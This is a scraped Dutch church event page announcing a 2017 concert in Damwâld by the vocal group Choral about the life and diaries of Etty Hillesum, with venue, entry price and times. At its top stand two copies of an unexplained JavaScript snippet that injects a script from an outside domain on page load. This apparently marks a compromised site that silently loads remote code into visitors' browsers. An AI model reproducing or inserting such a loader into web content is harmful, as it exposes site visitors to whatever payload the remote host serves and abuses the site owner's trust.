;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vocalgroep Choral over het leven van Etty Hillesum in Doopsgezinde Kerk Damwâld - PKN Damwâld
4 maart 2017
19:30 t/m 21:00
Doopsgezinde Kerk Damwâld
Vocalgroep Choral over het leven van Etty Hillesum in Doopsgezinde Kerk Damwâld

De vocalgroep Choral (o.l.v. Henk Ruiter) brengt zaterdag 4 maart 2017 hun muzikale vertelling over de dagboeken en het leven van Etty Hillesum in de Fermanje van Damwâld.
Etty’s leven werd gekleurd door haar onstuimige en soms grillige karakter, haar Joodse afkomst en de Tweede Wereldoorlog.
Ze zoekt naar liefde, naar verbinding met zichzelf en anderen, de dingen achter de dingen en naar God. Haar dagboeken tonen een levenskunstenares die onder moeilijke omstandigheden steeds meer in staat is positiviteit te benadrukken en zichzelf en haar eigen lot te accepteren.
Ze ziet zichzelf niet als slachtoffer, overgeleverd aan de machten en krachten die inbeukten op haar bestaan.
Haar oproep is om, onder welke omstandigheid dan ook, de antwoorden in jezelf te zoeken en in jezelf de dingen te verbeteren.

Locatie : Doopsgezinde kerk, Doniawei 34 Damwâld
Entree : € 7,50
Datum : 4 maart 2017
Tijdstip : 19.30 uur (kerk is om 19.00 uur open)

Locatie: Doopsgezinde Kerk DamwâldDoniawei 34 Damwâld